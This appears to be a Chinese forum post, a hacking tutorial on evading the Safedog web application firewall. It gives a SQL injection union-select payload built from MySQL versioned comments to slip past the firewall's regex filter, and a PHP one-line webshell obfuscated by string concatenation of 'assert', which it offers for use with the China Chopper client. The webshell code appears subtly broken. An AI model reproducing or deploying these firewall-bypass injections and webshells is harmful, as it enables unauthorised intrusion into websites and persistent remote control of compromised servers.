0x01 測試狗的特性
安全狗一直我很早直前就想測試的,正好借這次機會。
本地搭建好環境
服務器:2003+apache+mysql+php+安全狗
到網上看了一下資料,了解了狗不是在進SQL進行檢測的, 就是一個正則匹配,那就不難繞了。
寫了個測試腳本,我們提交正常查詢的時候安全狗就攔截了。
網上的方法好像都不行了,狗是最新版的了,更新在8號。
經過一天的測試,最后總結以下是狗不攔截的。
狗只攔截了聯合select和一些常用的函數,那么OK。
我們換成
/*!50000select/
當時測試是發現能過狗但是mysql語句有錯,最后測試如下:
Mysql是執行成功,我們用狗測試。
這里注意一下。User() 是被攔截的,換成cueernt_user狗是不攔截的。
最后繞過:
/*!50000union/*!*//*!50000select/*!*/1,2,3,4,current_user,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
0x02
逃避狗的嗅覺。
關於大馬這我也就不耗費精力去測試了,我們直接上一句話。

<?php $mysql="a"."s"."s"."e"."r"." "."t"; $mysql1=str_replace(" ","","$mysql"); $mysql1=($_POST[90sec]); ?>
菜刀方面就大家自行動手了,如果改出來了記得發我一份。
哪位同學有好的思路,可以自由發揮。